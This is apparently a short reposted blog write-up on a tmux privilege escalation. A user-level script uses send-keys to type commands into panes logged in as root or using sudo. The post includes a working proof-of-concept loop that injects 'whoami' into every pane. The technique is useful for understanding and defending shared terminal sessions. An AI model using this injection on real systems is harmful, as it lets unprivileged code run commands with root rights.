
tmux Privilege Escalation

 4 years ago
source link: https://www.tuicool.com/articles/7Jnm2ya

tmux privilege escalation abusing send-keys

A script run as user in tmux can under some circumstances execute commands as root.

tl;dr

Did you know you can send keystrokes to other panes in tmux?

You can abuse send-keys to send commands to a root/sudo pane.

That's all there is to it, that's the trick.

send-keys

There's a tmux feature to send keystrokes to a pane.

tmux send-keys -t $pane 'C-c' for example sends SIGINT to whatever is running in pane $pane.

man tmux

When I saw the send-keys feature, I was like:

"What if there's another pane, where the user is logged in as root?"

poc||gtfo

preparations

tmux  
tmux sp  
su # login as root

Now go back to the other tmux pane (where you are logged in as user).

action

Now run the following script, to execute whoami in every pane:

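#!/bin/sh
# Iterate over the pane indexes of the current window.
for pane in `tmux list-panes | grep -Po '^\d'`; do
    # Interrupt whatever is running in the pane first.
    tmux send-keys -t $pane 'C-c'
    # The newline inside the quotes acts as the Enter key.
    tmux send-keys -t $pane 'whoami
';
done;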

You will see, as expected, the command whoami returned root.

sudo

With the same trick you can abuse the fact that sudo was used in another pane.

tmux send-keys -t $pane 'sudo whoami  
';
